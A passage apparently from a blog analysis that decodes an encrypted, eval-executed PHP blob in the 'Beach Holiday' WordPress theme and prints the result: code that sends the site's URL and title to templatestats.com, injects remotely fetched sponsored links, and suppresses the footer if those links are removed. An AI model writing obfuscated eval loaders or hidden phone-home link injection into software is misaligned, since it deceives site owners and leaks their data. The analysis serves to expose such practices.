D6AA90BFC3C196909A7AD1D17ACDEDAB98C8B0A4DCD5CAAFD4CD8E8C60529AAB77403ABCB7BCA08895CCBAC9CFD6E8AB9EBFAFA1A38063CB77E570C9ACA0D4A4D6A69F77C8B99ED8DDBBC9BAC6CDEEB191BDA6AAC7E2C3BCD8DB8E87A7A1E4A4CCAD92C9BDB593D4D6CD7ED0646DE3B25A77A4A2C9E9CDADD2E0CFD6ABA59957C487909FC8C8A18F9A8375BEC8C7E6C196BBA0A5D6D9BF76AEAAB9B37886B95EC4877AA597825897D4C6B6C8CD91E2C0A6C66FA6D0E6816E96A3706C5BA4D6A1E29CA4CB749151D6D6D175ACAAC3C2C0A6C67C40719ACFC0D9A588CBABA6E16A9C66A8CECB82A5CDDECAC1B6CEC9EDC093CAB464CBE5C77DCED8CF9298A2DA5EE3695FC7BCC453A37B63847F7ED9ECB86F78A9AADCE6947D9CDCCBD0A79ED2A4D2AAA5B8C8C76BA0A989B6C5C393DBBC9B84B76896E6C2BE8FA39092413B95A2D2AAA6C3C8746E88B17EC7BACBD9DFBFA6837FA8CDE7CFB3E0DC8E87ACA4DD5CCEA9A3B8CD7C518FDEBFC9BDC9C8A16C6F94615DB8C5ADA29494868A99A1D5A994576E957478A1D7E4CEB4CBBBD6E3AD94C2A6A9919F95587771CFC95F53DAA3E09CA57F78C696DBE6C6C98298C9ECBEA1C8B45F889C806ED6DBD9C8AB5A95A2D2AAA6C3C8AF58DAD6CDC5C4C8D7DF738FB16899D7DABF75CA9186895D5295A2D2AAA6C3C8AF58DAD6CDC5C4C8D7DF738FB16899D7DABF75CAA5A39567629AAB77403AC9B9C8A6DADF7AC9C7C3D1A270A4BBB4ABD4EAB575CFD7CADC5E8F9A6B7740AE615DC696DCE6CCC375A0A5C69F77914BB3727F635891DCD6C2AA94D0A3D5A6A8949A957DBBB6955FBBCFD2DDC09BC5AF56DCDEBFBBD2C7D9C59695E395D1A0A57F7DCF3B71D8C6C4B7BBD09A70A6C6A099DADBBEB7E1C7D9C5969AE09DD263517BC8C490CBE3BFB9BECEC3EDAE91BFAFA4CDE8866E91DCD6C2AA94D0A3D5A6A8925E5D55DCE1B9C8B7B9D7E2BBA9939588BDBB955876726FCC9D5A9158D6AA90BFC3C196909A7AD1D17ACDEDAB98C8B0A4DCD5CAAFD4CD8E8C605297568D5896C4C4C8AA9095CEC5B4BDD6DFB09BCAA0A9CAD5C2BDDACD8F8CB23C7A39D29A99C67478A5D8D0BDC7BABECDEEABA5B8A09ED7E3BF897771E3C8A3A5D699D35F52BCC1C4A5E1997EC9C5B9C7ECB196BFB595DBD8B9B7DBD6CBD5605BEC3A764096BABCC3518CE5CAB4B8CCC9DEB5A6B5B498C7DFC8BCD2DAA16D40AF7BAD774197CCC2B7A5D1E0C875C9CAC3E0BBA1CAA6A8909FD55876CFD2D29993DD5091ABA1B6C7B690DBD9C9CC817ED8EAAB95C8A69AD1EAB9B4DCD7DAC8A991B99FDA9C80C5C0CD6C727AC3BB7D7ED8EAAB95C8A69AD1EAB9B4DCD7DAC8A991B99FDA9C80C5C0CD6EA5AEA096A1ADA99AC8AE76699FDBD5C2BDDACD8E8C57AEED50D6AA90BDC6C39FDCD0CAB6BCBF8CA375527FBC40717FC9B0CCDBDAC4A9A69959A8413A60BDC294D4E6BEBA75AEA9C79C7E97957BB8B7AE969B8A95C9A6A1E595DF65A1BFC4766C727A6379B8CFD6ECB1A0CA7E9DCDEAB9BDDDDCCFD2A55A98A4D2A4A1C3B5C896D4DACEBAB4C6CDE8B7A57D6A71727F6372E1D8C5C9A6A1E595DF9694C6C2C896D6E597C4B7B9CBDFC091B9AD9BC9E48277A8726F6CA0989950955B94CCC6C696D6E5979292A0A5C69F7776BDB288DBC7BEE1E18E879AA7E3A2D2A5A5B27BC09AD6DCCD7CB28384F6C852C9B5A8D8E5CD7691DCD6C29DA1E0A4D2A990BAC3C2A5CDDFCE8179BDD9ECBE97C4B5918FE2C3BCD8DB8DC06052926DAA5797B8C0C796889A7A7B7B7A88EEBC91C9A395DBDEC9C5AAA5BAB58C779159E8413A605DB994D0E07A79C9CAC3E0BBA1CAA6A8C7D9C9BCE1CDD4D7723C7A39EA413AD45ED13BC9D5BEB4B6BDD8E3BBA07E689DCDEAB9B4DCD7DAC8A9599D57E1A790BDC3C3A5CDE3817E90";
```

There, of course, follows an `eval` call on the result of this decryption:

```
eval(v_wY7yclWSLp7($v_eWbn5kRuK82,$v_tdr7R7sQn9U));
```

However, if you replace it with `echo`, you get the PHP code used to generate the template.

```
<?php

function tp_header(){
    echo '<style type="text/css">';
    echo '#content{float:right;}#sidebar,#menu li{float:left;}';
    echo '</style>';
}

add_action('wp_head', 'tp_header');

/*********************************************************************************************/
$tp_credit_footer = 'Presented by <a href="http://www.themegrade.com/" target="_blank">Wordpress Themes</a>, <a href="http://www.dy.my/" target="_blank">Asia Dedicated Server</a>, <a href="http://www.serverpoint.com/" target="_blank">Dedicated Hosting</a>';
$tp_credit_footer_HomeOnly=FALSE; /* FALSE or TRUE : TRUE will show only home/front page ( include page 2,3,4... ); FALSE show on every pages */

/* 
Text: <li><h4>Theme Credit</h4><div class="textwidget"> content </div></li>
List: <li><h4>Theme Credit</h4><ul> list with li </ul></li>
mix : <li><h4>Theme Credit</h4><ul> list with li </ul><div class="textwidget"> content </div></li>
$tp_credit_sb_home  and $tp_credit_sb_inner : won't show is leave blank ''
*/

$tp_credit_sb_home  = '<li><h4>Theme Credit</h4><ul>'.
'<li><a href="http://www.templatelite.com/wordpress-web-hosting/" target="_blank">Wordpress Hosting</a></li>'.
'<li><a href="http://www.apps4rent.com/sharepoint.html" target="_blank">Windows SharePoint Services</a></li>'.
'</ul></li>';

$tp_credit_sb_inner = '<li><h4>Theme Credit</h4><ul>'.
'<li><a href="http://www.apps4rent.com/sharepoint.html" target="_blank">Windows SharePoint Services</a></li>'.
'</ul></li>';

/*********************************************************************************************/
function theme_credit(){
    Global $tpinfo,$tp_credit_footer,$tp_credit_sb_home,$tp_credit_sb_inner,$tp_credit_footer_HomeOnly;
    $current=get_option('templatelite_links');
    $hash='6:100917';
    $post_variables = array(
        'blog_home'=>get_bloginfo('wpurl'),
        'blog_title'=>get_bloginfo('name'),
        'theme_style'=>$tpinfo[$tpinfo['tb_prefix'].'_stylesheet'],
        'theme_id'=>'6',
        'theme_ver'=>'2.00',
        'theme_name'=>'Beach Holiday',
        'link_footer'=>$tp_credit_footer,
        'link_sb_home'=>$tp_credit_sb_home,
        'link_sb_inner'=>$tp_credit_sb_inner,

    );
    if(!isset($current['time']) || $current['time'] < time()-172800) $current=FALSE; /*min 48 hours*/
    if(!isset($current['hash']) || $current['hash']!=$hash) $current=FALSE;

    if($current===FALSE){ 
        $new=array();
        $new['time']=time();
        $new['hash']=$hash;
        $new['links']=templatelite_get_links($post_variables);

        if($new['links']===FALSE){
            if(!empty($current['links'])){
                $new['links']=$current['links'];
            }else{
                $new['links']=$tp_credit_footer;
            }
        }elseif($new['links']=='--'){
            $new['links']=$tp_credit_footer;
        }

        $new['links']=strip_tags($new['links'],"<a>"); /*make sure only text and link are allow.*/

        update_option("templatelite_links",$new);
        $return_link= $new['links'];
    }else{
        $return_link= $current['links'];
    }

    if( $tp_credit_footer_HomeOnly===FALSE || (is_home() || is_front_page()) ){
        echo $return_link;
    }
}
function templatelite_get_links($post_variables){
    if(!class_exists('WP_Http')) include_once(ABSPATH.WPINC.'/class-http.php' );
    $request = new WP_Http;
    $url="http://www.templatestats.com/api/api.v2.php";
    /*$url="http://templatestats:88/api/api.v2.php";*/
    $result = @$request->request($url,array( 'method' => 'POST', 'body' => $post_variables));

    if(!isset($result->errors) && isset($result['response']['code']) && $result['response']['code']==200){
        return trim($result['body']);
    }
    return FALSE;
}

$tp_sb_show=FALSE;
function theme_sb_credit(){
    global $tp_credit_sb_home, $tp_credit_sb_inner, $tp_sb_show;
    $tp_sb_show=TRUE;

    if( (is_home() || is_front_page()) && !empty($tp_credit_sb_home)){
        echo $tp_credit_sb_home;
    }elseif(!empty($tp_credit_sb_inner)){
        echo $tp_credit_sb_inner;
    }
}

function tp_footer(){
    global $tp_sb_show,$tp_credit_footer_HomeOnly;
    if($tp_credit_footer_HomeOnly===FALSE || (is_home() || is_front_page()) ){
        ob_start();
        include TEMPLATEPATH."/footer.php";
        $current=get_option('templatelite_links');
        $tp_footer_content=ob_get_clean();
        if( ($current===FALSE || empty($current['links']) || strpos($tp_footer_content,$current['links']) !== false ) && $tp_sb_show==TRUE ){
            echo $tp_footer_content;
        }
    }
}

add_action('get_footer','tp_footer');
```

This appears to be a simple template file for Wordpress, nothing nasty as you could've expected - but that's not the way it's always, in such an obfuscated code, many nasty things can be hiding.